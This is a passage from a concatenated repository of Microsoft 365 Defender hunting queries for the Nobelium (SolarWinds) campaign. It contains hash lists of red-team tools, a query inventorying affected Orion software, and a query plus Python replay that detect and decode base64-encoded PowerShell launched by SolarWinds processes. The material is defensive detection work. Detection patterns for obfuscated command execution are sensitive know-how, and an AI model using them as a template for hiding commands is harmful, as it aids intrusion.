'25be1b61ce1f9dcc498c64a5a753efb96df3ae4c', '39bb0e9765e0137d09dc8d41fa1dded24e1fdeed', '5b93345c18faa20ef1f2d3f7fb5a299c27e4b66d', 'f5a605c29af773c9f5604c8f5546c991d24d2dc2', 'db99f1ef9b630fc16deb23d8c7d7df2441bc80e5', 'c226cb69f2a017712cc94493f51d7726f933bcda', '5b3b08f15ac3bbf2644f88b0615536f33a1ff1a8', '42f81c4cfca1438371829b7ad5e7b3db54a2cddf', '1c23dd83c6ebba6f870b1ad02f326ea730ea53a5', '2b663679da2a7070f91945784ac167ed3ded7280', 'fd1e67da7919dc7d0fbab0c5d02ee6e12537f2ef', '93c1078cb6d0aeab90eb0b83ec4a737ce7bcccdc', '05d900d16d2738b0bded3ba4a60ff24adc0776f1', 'fc19e8dae2215446ade30b6bc7aa5d4b0d6627f7', 'f30ef3957c930cf2aa74361d4d229777e7ee40ef', '964e161dd92df9b160a6f7c7d1dedf216e8fed2c', 'bf4254555a5f4d3299aae8d4ffc28bbb1dfec3c6', '50726acc45f673d6f0924a8bf030f3f07b1cd9c5', 'd535de08875cef1c49bfa2532281fa1254a8cb93', '7935da6efb19ea558fe6b1f98f3b244b4a74794b', '589f7878efd02dd5a0832c6e523f4914cbcfd450', '8f7d4f9eed06c1d175ef6321fb7110183aabbb7c', '467b32e7414308b245c6c004303a5638e0fa7bdf', 'b98cded462dfd80c682c953830e3df744cac756d', '3df6b6fb4870b66931e91a59a5f9c013198bc310', 'c26f164336ea82a40b2186270249d2fe5571b12d', 'e53ff219a6d5d0713ddfa54f8fff7ff703e5e85f', 'fa9905d231bb1565086dcf2608ee2125bf585c01', 'c1fe1a306c4d7106d5a0bb47d3880836d9ecc2c6', '7323ca7b92edbd195b2d7e18c91fd48b4c96a0cc', 'f9881d2380363cb7b3d316bbf2bde6c2d7089681', 'ca112215ba3abf12bd65e15f018def811b9d5938', 'bcdf6ddccab0c348d85ca52077ffbef12f94a336', '28a15a0b532c47110297aa6f4f46bad4d72235a2', 'ad5bff008e0e270d19eaa7e211b1c821d4091b68', '7f308945c4904ef168bbf57c86e56c8a3f836a2e', '74fc338bbab1a1f42699165c588dc91639d0343b', '4f3ec6a4af8fddf85a0f2933b6cabee44e74fe33', '41a491270ec2bd6d230be4d163c719e6d46265e7', '17e199488c301aad10861cdeb1ee5087d2c87517', '0225b06163d58bc55c6e4f6b451c5553dc9558c7', 'f6bb18873580f645c09758fda398655ce5e3eff3', '2933c394fa06892dbd1ce2937b4c2344e8239ef8', 'a6119a5c321b2755bffdb4919d910a18b0613842', '86e975d05de96e0ea088ffdde9993f9247f0ee03', 
'3248ac428a7c888723398a5c2535b5b95f550754', 'b1b5dbea32917b7db654dc193de98b840abdbcb5', '004809dcd28c0cf078d65cc11a478d50cb3cba0d' ] ); let SHA256Hash = dynamic( [ '77bdcb2a9873c4629d8675c8ce9cc8a0cf35c514e27f7a6dc2bc4b31f79dd9e2', 'f937aa71e0b1cb3f9a4d5c0e8ffa4f383b781dd878e71e4b73c1f084b4a7e6de', '8469341f65cc42b86ef7ded04eca8a00266f34d6d2916330af1bf40fb69e26f0', 'd3ca5583c98a4ab0cc65773addd3444435eea13e70e3929629535f14dfe8b63b', '2051f5d7c79e67a02880ca9f2fc0cdf4fa8827fc515f16baa743193c9b178ba0', '4ce2df07fecdc7f7852c686440e3b421c159d8fc382481ce70165a77741fb2c4', '9e170d1146efeee09f888c7b1bbfb10dec3ede9cc0b20b6b137c52dd146fd302', '2b7a2703e77cb735fae7b90bbd5a2fa481aea1c34c3fb7bfada61cbcebb35efc', 'd0b6413c3dabe564435291b65f28119ad5a9c1fabc05ee48820f728740cb1a03', '4be84a291b6c6a5f019c1c6b1ceff3b4bc3668d5874b1a423838a57560788158', '79f2cd2009fe104e5ed6ad25d0ba06b10fb7c0983e88beab27e55b78cd2a5300', 'c4bb5b85710d7e78e82a57eb2ac2c8f7796972bada1ddc6af7ae6d318bc87aa3', 'a9827ea4e45194c65a3ff6cf03345b16bd24047165bd91d4595caae8488529db', '59a4ae454be71f8a036a7b4c74ae40f4ca6e7105dabfabb4637e87b7a9afb51d', 'fe33146518676279692217e32f8c36a9749d705981e672ebbde79c80b32dd8b7', '6e1c976151313a24fbd1f620a0a2c66aaf5489d44b8153eb12e789bfbea3731f', '5751ac3b127f6c8cf251d995ac6254f8999ab227dd6da870f1e0249b3ce56bb6', '964efc495e4e1a2075fcd48a661166fb8df81d81d8ac2c26768325dc15da7f70', 'd9882283ee2dc487c2a5fb97f8067051c259c4721cd4aea8c435302fe6b274c4', 'c11d6bdda1972a2f538f0daea099df17ce76077098b9f3f72459cf7db1ec5ec6', '178dc666df641f4f1f184d54c7bcac4764e81bb1c3b03a7207b321660c77770b', '5756a54a1d9ae74df58008048c6042e7254cc7eed0389f556db3f000cb191000', 'c828558c67601c94511720748a49703b09814bcd21be2caa98b36faa445e19db', 'a57112c53bf2ee334a6d01b39cb43ec8de42ba18ea925d55132567274b742ce6', '6e05bebdc38c4bd34c83d2ca6b954ce84c87ed78fd0d932576593a3ad710e3c3', '25e755c8957163376b3437ce808843c1c2598e0fb3c5f31dc958576cd5cde63e', '8e16cd7d498eb69d7b3e079e1353e0df6eec70a845986475d7cf65a6740b4434', 
'44f3c63c1f6414f2c3e602a57ba38f340287fe2acc15ff0c88dca503c67b1a0c', 'fe664bb9dc2976d6d2ccc07582b5c5eb85b896cc439a9af91db7e51b1c905bdb', '3805caa8e426a6f7d7d3ce9c87ce188b20185b134d936a69b9d51125b1264dea', '40db7affc23dcaf88c288d6a918b6371a45dcfa16e08543e9442d4d952a9ecc4', '4878d5d7933e096305c70c83499b84893b6bd0dbe226e16ea90430efeb8b8593', 'faf76f9e66c7392cddbe7bcc73b00dc2ca2d8d1da6f46f5686dadc2e0a559acb', '09b1003b673b559c3599dcb9250112bd3a602602f2836b54d5d7cdd1c4c4e6f2', '3f1d22893c626346f8d361076bc66797d55b09a959ec0d36ec3d48048983f138', '652d3717353df8fc3145ecc9f2c871034a58f2519bdd0c70a72a3d8c88bad48c', '078403b4e89ff06d2fe2ed7e75428a381f83ffb708dbd01b0220767498947f0c', '82cce26c60a5105e6caf5ac92eabb3dedcd883cd075f2056f27b0ec58aefaaa6', '4d004d168b0bb9bed836404e850796173ac27efd8489738394a265478224cf27', '6652e27ad1bf5002665b2d0821e75092a087103408560682295f90706a3289cb', 'b051ee189faf36e2d6c382fede530e9274b42bc9c42e210b4ee1bc84b0419ba6', '0340043481091d92dcfb2c498aad3c0afca2fd208ef896f65af790cc147f8891', 'bfe88e7986fbf27db90f18959a0b1e237b6f0395fa11b9eb386e5bac143c1d2d', '7404a08ecc0aa0d84f039d078ad39804856206ae58dde360238d4a1943557333', 'efb533249f71ea6ebfb6418bb67c94e8fbd5f2a26cbd82ef8ec1d30c0c90c6c1', '73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f', '9a84cb10b7ba0b96eea473900d58052511af7b235383b6a496dffab9b982d20d', '9af4272d6cc0e926f74ccf68d0a4d056eb37059214c312ef3628bca45a7d76cf', 'b262d0c81ac5a13c1a6aa650d1ca7b04117f654a2a97bfe7ac4a7ca8ae9a6ed5', '432010e6d7a42710b10464e440fa4e2df2bb387839d56a5b371727dc6c3da272', 'b58de9beaf70bfd12cd6fb372f52eff5405f96602c22034a80ef01b4f9e2ded4', '5f0bc27c272937e3ef788c290939481137148c1c5c70dbb7d1fb13cb22e3e2c1', '7b59090b78127381593460ccea2ea64d6c5838cd8cb0e97c5e436ae58e69cdee', 'e7046b7eac25ceb5274c815aba4384099524eacf9aed683179aa29ac5f45ede8', '38c1cab0a8c9870f2cc7cfa5f3f782c0bb8ede94ce89a41a5e9509a79d7fdf5e', '393cd1ecf955d6938f9a9ba65808a209e7741e2fd17baa91e4960aca799be86f', 
'681b1b85a0f8a7ede2c6bf8c71ad4cb56ccc4e1bb400783c93ee9b5ab76d3da6', 'd104de2912949e598f12b2b517bdbec17896cee8305766e72bbb4e604205b2b4', 'eb7bada29bcf4c6b94f7ab710a8a6702f26845c9678826ff0dfc7494a5e8186d', '4a5f1df73581c531e62e73fe1ab374d1d93b3846d8e6b80833fd295e0fbc23f1', '895d49db09b64f15782073d4ff4a0fe21cd91f9b9fa9902053278799313b13b1', '99b622046fb5e122a6f2dadad0858cdd1056582701fb0968c57ec6171dc4c0ee', '8f79942feb0c8533ce01f867902f4a72d328681249fd474b0215e9d9b4477f67', '948f9fc9b5979fb66e91964bb2bee0b42b7e8f6b6436188fee9fb69b676d2f42', '356266255b6aa6ba096cd8048a6a43488ffc21845430d7d0f798fd9022879377', '4e35c7d135bd7f55cdec68d7acf176ae84b850e927fdffb005e000fef5b35a21', '609aa1b6ebbeb93a76898219ad470832c4dd838fb3214989841af8b90fcef695', '5e0fb8cab745678487ac1ed99b5ec2fa2d54a65cbf0e2cb9208785200f2c2b8b', 'aa4349b6531544093c4dbc1d2a7b8680d3308cbde313a38c27cd211dd80ee9d1', 'f0a59a724ee6631b7f2ae88aa9ec7c24a82f8c912512352d93d058a928c33c70', '1cf5710e500a423b84b51fa3afdd923fe0a8255c5817d3238175623e2ebbfad9', '959be603c11951ead9c13efd0451ba23e743ec3019562f7715c5b0306ae70537', '0cb570e4e5229dbe488bba92f57b5951a69335dd625aa6ada0ccb34c918613b2', '60d3a8c8a7e8bdb67a44ad4f220e52593bf46d2ce6e8d40b6db9045c68cee413', '71b11d28dec1dadc738c4b993dba32e3c33a85421de66120be62f3ec0ed50c3e', 'b6ef03aec5d10e371f0b06c661036d838ef55fa7dc75cf91fca3622bdefa8140', '791cb9883187ada5274c976a2e05dc756c48eda88fabdfe2eb7e19f59f0182e5', '1ba2ef33e69d6bc03ba02a68ecd701b1eee6a33aabd44509e3b344d0948cf9f4', '1353ffc96e0a701fa8b3dc2835a8be6199e3c8f079663ebffb6b665750ef8af9', '2effc706d002ebf5c18160ba1cec9f88adbc4a36a3daaf5dbacc8c0dd6ad46b6', 'd13ec5610c22bad31a47b59791b6e964d4703b4019094fd44c8151ee802db7ea', '3ac5a8f9f2f80b7a8b5267a5cd523dd449b2de5ccb7b30e448ef0dcfc8995506', 'c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93', '899ad5af2b4ad14fa58612dc2938598ac7e892d759659aef87e4db46d70f62bf', 'e1d466b44e0dffafe4a2d0ebade37ea5f9b6a30ccf16f59d4d2e32f9204a03f8', 
'a022820a62198fa3e3b89749b38db1cc3a09136524682fb99a3ce36652725065', '3c9a7aa8cc4fd0538532e757a756709897c94b2653152a40993c7d0a47503980', '6c8f967b12cf84eed7b8c039e04614e50cd7fcd8ca9e01563bb6f5f0a11dcb8c', 'bb4229d4fe06209fc7c8ed44da8f353dcb980b5f1a5229c7e1f17b772ff8fd8c', 'e2f7afedf6dbeaeae60a1434a8735acd426087fd16689b29b869ebe88cdbef85', '504be292cf783ce6cb0c356034e69b76a465ec534386a776663810266d64da33', '42389f51dc60590c2daab696e8782c3f4dd9f9a4c98a3b987e10d43174deba38', 'eec42b1fb5275eaf3e0229db99421e2b16a3c82bb64da3305662622dc2d6e07a', '33b8b7198b8e9a24b415d280d673cfa4efe4d249ac9e21703a61c65dc0933d74', 'c91e8e5c2491f7708c4e550c18acab121e1b245ade7b2abb79cdd25b8a9cf379', 'b292ae784ab91b99cc2b8f5cc173813cdb52fb75c6dab85bd1ce05a244b85fca', '629c0a325f24016534ebc2e0578068593ca883557f8c10cc1ae4d5b0ab91bfec', 'bc6d23e865cdbc4d57451e80797be2b2feff531ca2743c533e5d114c3a19433d', '7b1e06cf7c362e62b156652b069a4ca1800e0ab72730636f64cc24dabd3830a8', 'cc9da7fce451e409a4d994b4675db6a3651a551b9a004461d14a3d3532765d84'
]
);
DeviceFileEvents
| where SHA1 in(SHA1Hash) or SHA256 in(SHA256Hash) or MD5 in(MD5Hash)
| union DeviceImageLoadEvents
| where SHA1 in(SHA1Hash) or SHA256 in(SHA256Hash) or MD5 in(MD5Hash)
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | v | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info

**Contributor:** Dario Brambilla

**GitHub alias:** darioongit

**Organization:** Microsoft 365 Defender

================================================
FILE: Campaigns/known-affected-software-orion[Nobelium].md
================================================

# View data on software identified as affected by Nobelium campaign

This query was
originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.

Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).

Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.

The following query searches Threat and Vulnerability Management (TVM) data for Orion software known to be affected by the Nobelium campaign.

More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.

## Query

```kusto
DeviceTvmSoftwareVulnerabilities
| where CveId == 'TVM-2020-0002'
| project DeviceId, DeviceName, SoftwareVendor, SoftwareName, SoftwareVersion
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/launching-base64-powershell[Nobelium].md
================================================

# Locate SolarWinds processes launching suspicious PowerShell commands

This query was originally published in the threat analytics report,
*Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.

Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).

Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.

The following query detects events when SolarWinds processes launched PowerShell commands that were possibly encoded in Base64. Attackers may encode PowerShell commands in Base64 to obfuscate malicious activity.

More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.
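The Kusto query in the following section pulls a base64-looking run out of the command line, trims it to a whole number of base64 quanta, decodes it and strips the NUL bytes that UTF-16LE (the encoding `-EncodedCommand` expects) leaves behind. The Python below is an added example, not one of the repository's queries, that replays those steps over constructed `DeviceProcessEvents` rows; the helper names, the sample command lines and the benign encoded command are assumptions made for the illustration.

```python
"""Added example: a Python re-implementation of the extraction and decoding steps of
the Kusto query below, run over constructed DeviceProcessEvents rows (not real telemetry)."""
import base64
import binascii
import re

# Mirrors extract('([A-Za-z0-9+/]{20,}[=]{0,3})', 1, ProcessCommandLine)
B64_RUN = re.compile(r"([A-Za-z0-9+/]{20,}={0,3})")


def extract_base64(cmdline):
    """Return the first base64-looking run, trimmed to a multiple of 4 characters.

    The trim mirrors substring(x, 0, (strlen(x) / 4) * 4): a run that the regex
    cut off mid-quantum would otherwise fail to decode.
    """
    match = B64_RUN.search(cmdline)
    if not match:
        return None
    run = match.group(1)
    return run[: (len(run) // 4) * 4]


def decode_payload(token):
    """Decode the way make_string(base64_decode_toarray(x)) does, then drop NULs.

    Each decoded byte becomes one character (which is what latin-1 gives us);
    stripping '\\0' turns the UTF-16LE that -EncodedCommand uses into readable text.
    Returns None when the token is not valid base64.
    """
    try:
        raw = base64.b64decode(token, validate=True)
    except binascii.Error:
        return None
    return raw.decode("latin-1").replace("\x00", "")


def looks_like_encoded(token):
    """The heuristic from the query's commented-out filter: real base64 blobs
    mix upper-case letters and digits, long plain words usually do not."""
    return re.search(r"[A-Z]", token) is not None and re.search(r"[0-9]", token) is not None


def hunt(events):
    """Apply the query's row filters to DeviceProcessEvents-like dicts and return
    one result per surviving row, with the extracted and decoded fields added."""
    results = []
    for ev in events:
        # =~ in Kusto is case-insensitive string equality
        if ev["InitiatingProcessFileName"].lower() != "solarwinds.businesslayerhost.exe":
            continue
        if ev["FileName"].lower() != "powershell.exe":
            continue
        token = extract_base64(ev["ProcessCommandLine"])
        results.append({
            "ProcessCommandLine": ev["ProcessCommandLine"],
            "base64_extracted": token,
            "base64_decoded": decode_payload(token) if token else None,
            "heuristic_hit": looks_like_encoded(token) if token else False,
        })
    return results


# Constructed sample rows. The encoded command is benign and is built here the way
# PowerShell's -EncodedCommand expects it: UTF-16LE text, then base64.
ENCODED_CMD = base64.b64encode("Write-Host 'hi'".encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    {   # what the query hunts for: the Orion host process spawning encoded PowerShell
        "InitiatingProcessFileName": "SolarWinds.BusinessLayerHost.exe",
        "FileName": "powershell.exe",
        "ProcessCommandLine": "powershell.exe -NoProfile -EncodedCommand " + ENCODED_CMD,
    },
    {   # same parent, an ordinary script invocation: no base64 run at all
        "InitiatingProcessFileName": "SolarWinds.BusinessLayerHost.exe",
        "FileName": "powershell.exe",
        "ProcessCommandLine": r"powershell.exe -File C:\Scripts\healthcheck.ps1",
    },
    {   # a long plain token trips the regex but not the upper-case/digit heuristic
        "InitiatingProcessFileName": "SolarWinds.BusinessLayerHost.exe",
        "FileName": "powershell.exe",
        "ProcessCommandLine": "powershell.exe -Command Get-Date -Format MMddyyyyhhmmssffffffzzz",
    },
    {   # a different parent process: dropped before any extraction happens
        "InitiatingProcessFileName": "explorer.exe",
        "FileName": "powershell.exe",
        "ProcessCommandLine": "powershell.exe -EncodedCommand " + ENCODED_CMD,
    },
]

if __name__ == "__main__":
    for row in hunt(SAMPLE_EVENTS):
        print(row)
```

The third sample row shows why the query's authors left the upper-case/digit filter in as a comment: it cuts false positives from long plain tokens, but it is a heuristic, so review what it drops before enabling it.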
## Query

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName =~ "SolarWinds.BusinessLayerHost.exe"
| where FileName =~ "powershell.exe"
// Extract base64 encoded string, ensure valid base64 length
| extend base64_extracted = extract('([A-Za-z0-9+/]{20,}[=]{0,3})', 1, ProcessCommandLine)
| extend base64_extracted = substring(base64_extracted, 0, (strlen(base64_extracted) / 4) * 4)
| extend base64_decoded = replace(@'\0', '', make_string(base64_decode_toarray(base64_extracted)))
// | where notempty(base64_extracted) and base64_extracted matches regex '[A-Z]' and base64_extracted matches regex '[0-9]'
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/launching-cmd-echo[Nobelium].md
================================================

# Locate SolarWinds processes launching command prompt with the echo command

This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.

Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).

